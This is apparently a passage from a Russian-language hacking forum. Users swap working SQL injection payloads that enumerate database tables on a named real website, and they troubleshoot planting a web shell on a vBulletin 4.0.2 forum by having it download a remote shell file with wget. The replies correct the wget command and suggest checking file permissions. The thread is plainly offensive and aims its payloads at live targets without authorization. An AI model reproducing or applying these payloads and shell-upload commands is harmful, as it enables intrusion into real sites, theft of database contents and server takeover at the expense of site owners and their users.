ой, сорри, ступил

странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

выводит пустую страницу без новостей, и ошибок

так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--

хелп) сос))

Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается???

1. Писать не -o, а -O (зааглавная).
2. Правильно писать так: wget http://shell.com/shell.txt -O shell.php
-O - чтобы залить с другим именем.
-o - вместо шелла заливает по заданному адресу РЕЗУЛЬТАТ ЗАЛИВКИ, т.е. это не то.
А может прав нету? Проверь id; ls -la;
Если и вправду прав нету, то ищи где есть и делай так:
cd /tut/prava/0777/; wget http://xx.narod.ru/shell.txt -O shell.php
или в -O укажи путь новый, т.е. чтобы cd не писать.

DIEZalok Прочитай plz личку)

неее не катит....
http://www.looplifter.co.uk/news.asp?id=1

http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+cast(table_name+ as+int)+from+information_schema.columns)--

Я конечно понимаю что методом тыка, может что-то/когда-то получится, но всё же...Для начала узнайте что находится в базе information_schema и станет намного легче искать решения проблемы.

вот объясните (незнаком я с внутренним миром бд) впервые вижу такое сочетание:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.columns)--
такой запрос что выводит? таблицу, колонку?

вроде вывод ВСЕХ колонок бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+column_name+from +information_schema.columns)--

вывод ВСЕХ таблиц бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.tables)--